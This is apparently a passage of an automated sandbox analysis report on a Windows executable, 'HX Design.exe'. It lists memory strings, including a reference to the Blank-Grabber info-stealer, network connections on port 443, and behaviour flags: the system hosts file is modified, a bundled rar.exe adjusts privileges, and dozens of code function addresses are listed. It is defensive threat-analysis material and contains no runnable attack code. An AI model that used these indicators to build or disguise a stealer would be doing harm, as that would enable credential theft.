              Source: HX Design.exe, 00000001.00000003.2097242552.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B482E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B482C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
              Source: HX Design.exe, 00000001.00000002.2100464730.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096001614.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706871511.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101258712.00000294B4F50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: HX Design.exe, 00000001.00000003.1684305710.00000294B4411000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: HX Design.exe, 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: HX Design.exe, 00000001.00000002.2102914247.00000294B5BA4000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: HX Design.exe, 00000001.00000003.2094717428.00000294B558B000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102804197.00000294B558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.micros
              Source: HX Design.exe, 00000001.00000003.2094717428.00000294B555D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: HX Design.exe, 00000001.00000003.2087756770.00000294B46D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: HX Design.exe, 00000001.00000003.2094717428.00000294B555D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: HX Design.exe, 00000001.00000003.2087756770.00000294B46D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: HX Design.exe, 00000001.00000003.2094717428.00000294B558B000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102804197.00000294B558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/9Z
              Source: HX Design.exe, 00000001.00000003.1706357551.00000294B4C69000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: HX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706973666.00000294B4D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: HX Design.exe, 00000001.00000002.2101379289.00000294B5050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: msedge.exe, 0000003B.00000002.1926276672.000076D80010C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
              Source: msedge.exe, 0000003B.00000002.1918020768.00000143C5253000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1922760147.00006FA40024C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1933510303.000078BC00220000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929899175.000076D80030C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1925527221.000076D8000A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931020415.000076D8003D4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929221857.000076D8002B4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928592843.000076D800228000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929816645.000076D8002F4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929153808.000076D8002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928665494.000076D800234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: chrome.exe, 0000003A.00000002.1925562449.00002F0400164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/0(p
              Source: chrome.exe, 0000003A.00000002.1929650612.00002F040036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929899175.000076D80030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/8
              Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
              Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/CharC
              Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/ngType
              Source: chrome.exe, 0000003A.00000002.1928433733.00002F0400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sibilityChangedWebContentsObserver.OnVisibilityChanged
              Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/v
              Source: chrome.exe, 0000003A.00000002.1917350022.000001C518090000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1917774956.00000143C5200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comC:
              Source: chrome.exe, 0000003A.00000002.1931983155.00005F5800236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comH
              Source: msedge.exe, 0000003B.00000002.1921738447.00004C68002B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comLh
              Source: msedge.exe, 0000003B.00000002.1920928232.00004C6800238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comLh#
              Source: msedge.exe, 0000003B.00000002.1922367140.00006FA400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comP
              Source: msedge.exe, 0000003B.00000002.1923306413.00006FA400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comx
              Source: HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2106274168.00007FFDFB2AA000.00000004.00000001.01000000.00000010.sdmp, HX Design.exe, 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
              Source: HX Design.exe, 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4B1F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
              Source: HX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\HX Design.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: cmd.exeProcess created: 49
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D213A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,73_2_00007FF77D213A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exeCode function: 73_2_00007FF77D23B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,73_2_00007FF77D23B57C
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732085C000_2_00007FF732085C00
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320869640_2_00007FF732086964
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320689E00_2_00007FF7320689E0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320610000_2_00007FF732061000
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320808C80_2_00007FF7320808C8
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732071B500_2_00007FF732071B50
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732083C100_2_00007FF732083C10
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732072C100_2_00007FF732072C10
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320864180_2_00007FF732086418
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320808C80_2_00007FF7320808C8
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73206A4740_2_00007FF73206A474
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73206ACAD0_2_00007FF73206ACAD
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320719440_2_00007FF732071944
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320721640_2_00007FF732072164
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320739A40_2_00007FF7320739A4
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73207DA5C0_2_00007FF73207DA5C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73206A2DB0_2_00007FF73206A2DB
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320897280_2_00007FF732089728
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320717400_2_00007FF732071740
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732071F600_2_00007FF732071F60
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320787940_2_00007FF732078794
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320698000_2_00007FF732069800
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320818740_2_00007FF732081874
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320840AC0_2_00007FF7320840AC
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320780E40_2_00007FF7320780E4
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732075D300_2_00007FF732075D30
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732071D540_2_00007FF732071D54
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73207E5700_2_00007FF73207E570
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF7320735A00_2_00007FF7320735A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732085E7C0_2_00007FF732085E7C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF732079EA00_2_00007FF732079EA0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 0_2_00007FF73207DEF00_2_00007FF73207DEF0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732085C001_2_00007FF732085C00
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320869641_2_00007FF732086964
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320610001_2_00007FF732061000
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732071B501_2_00007FF732071B50
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732083C101_2_00007FF732083C10
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732072C101_2_00007FF732072C10
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320864181_2_00007FF732086418
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320808C81_2_00007FF7320808C8
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73206A4741_2_00007FF73206A474
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73206ACAD1_2_00007FF73206ACAD
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320719441_2_00007FF732071944
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320721641_2_00007FF732072164
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320739A41_2_00007FF7320739A4
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320689E01_2_00007FF7320689E0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73207DA5C1_2_00007FF73207DA5C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73206A2DB1_2_00007FF73206A2DB
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320897281_2_00007FF732089728
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320717401_2_00007FF732071740
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732071F601_2_00007FF732071F60
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320787941_2_00007FF732078794
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320698001_2_00007FF732069800
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320818741_2_00007FF732081874
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320840AC1_2_00007FF7320840AC
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320808C81_2_00007FF7320808C8
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320780E41_2_00007FF7320780E4
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732075D301_2_00007FF732075D30
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732071D541_2_00007FF732071D54
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73207E5701_2_00007FF73207E570
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF7320735A01_2_00007FF7320735A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732085E7C1_2_00007FF732085E7C
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF732079EA01_2_00007FF732079EA0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FF73207DEF01_2_00007FF73207DEF0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFAD903501_2_00007FFDFAD90350
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFACE13001_2_00007FFDFACE1300
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFACE22701_2_00007FFDFACE2270
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFACE19501_2_00007FFDFACE1950
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2A90601_2_00007FFDFB2A9060
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2F92B01_2_00007FFDFB2F92B0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3022501_2_00007FFDFB302250
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2E9B901_2_00007FFDFB2E9B90
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2E3C101_2_00007FFDFB2E3C10
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB33CC401_2_00007FFDFB33CC40
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB372C401_2_00007FFDFB372C40
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB31CC591_2_00007FFDFB31CC59
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB392BF01_2_00007FFDFB392BF0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2FCC401_2_00007FFDFB2FCC40
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB344B201_2_00007FFDFB344B20
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB336B401_2_00007FFDFB336B40
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB34BB001_2_00007FFDFB34BB00
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB38FB101_2_00007FFDFB38FB10
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3099A01_2_00007FFDFB3099A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2EFA101_2_00007FFDFB2EFA10
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3918A01_2_00007FFDFB3918A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2E288E1_2_00007FFDFB2E288E
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3988D01_2_00007FFDFB3988D0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB39A8601_2_00007FFDFB39A860
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2EA8C01_2_00007FFDFB2EA8C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3258801_2_00007FFDFB325880
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3429501_2_00007FFDFB342950
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2F69301_2_00007FFDFB2F6930
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB36BFC01_2_00007FFDFB36BFC0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB394FC01_2_00007FFDFB394FC0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB38DFE01_2_00007FFDFB38DFE0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3070401_2_00007FFDFB307040
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3080201_2_00007FFDFB308020
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB37CEA01_2_00007FFDFB37CEA0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB324E701_2_00007FFDFB324E70
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB35CF301_2_00007FFDFB35CF30
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB30DDB01_2_00007FFDFB30DDB0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2F0DC01_2_00007FFDFB2F0DC0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB36ACA01_2_00007FFDFB36ACA0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB33BCC01_2_00007FFDFB33BCC0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB364C701_2_00007FFDFB364C70
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB32BC801_2_00007FFDFB32BC80
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB378C801_2_00007FFDFB378C80
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2F9D001_2_00007FFDFB2F9D00
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2EBD301_2_00007FFDFB2EBD30
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3543B01_2_00007FFDFB3543B0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2FC3801_2_00007FFDFB2FC380
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3862A01_2_00007FFDFB3862A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3A42B01_2_00007FFDFB3A42B0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3972C01_2_00007FFDFB3972C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB32F2D01_2_00007FFDFB32F2D0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2FD2B01_2_00007FFDFB2FD2B0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2E32F51_2_00007FFDFB2E32F5
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3473501_2_00007FFDFB347350
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB30F2F01_2_00007FFDFB30F2F0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2E73361_2_00007FFDFB2E7336
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB36A3001_2_00007FFDFB36A300
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB30D3101_2_00007FFDFB30D310
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB38A3101_2_00007FFDFB38A310
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB38B2301_2_00007FFDFB38B230
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2F21E01_2_00007FFDFB2F21E0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3980B01_2_00007FFDFB3980B0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3870601_2_00007FFDFB387060
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB36E0F01_2_00007FFDFB36E0F0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2E41201_2_00007FFDFB2E4120
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB34C8401_2_00007FFDFB34C840
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3527E61_2_00007FFDFB3527E6
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2E48201_2_00007FFDFB2E4820
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3686B01_2_00007FFDFB3686B0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3406C01_2_00007FFDFB3406C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3996C01_2_00007FFDFB3996C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB33E6701_2_00007FFDFB33E670
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3577501_2_00007FFDFB357750
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3115A01_2_00007FFDFB3115A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB33B5B01_2_00007FFDFB33B5B0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB30E5C01_2_00007FFDFB30E5C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2E45701_2_00007FFDFB2E4570
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3045A01_2_00007FFDFB3045A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2F36501_2_00007FFDFB2F3650
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3854A01_2_00007FFDFB3854A0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB3874601_2_00007FFDFB387460
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB2E94D01_2_00007FFDFB2E94D0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFB32A5101_2_00007FFDFB32A510
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFDFBAB33C01_2_00007FFDFBAB33C0
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE00355C001_2_00007FFE00355C00
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE00311D931_2_00007FFE00311D93
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003116FE1_2_00007FFE003116FE
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003187201_2_00007FFE00318720
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE0031116D1_2_00007FFE0031116D
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003888701_2_00007FFE00388870
              Source: C:\Users\user\Desktop\HX Design.exeCode function: 1_2_00007FFE003489201_2_00007FFE00348920
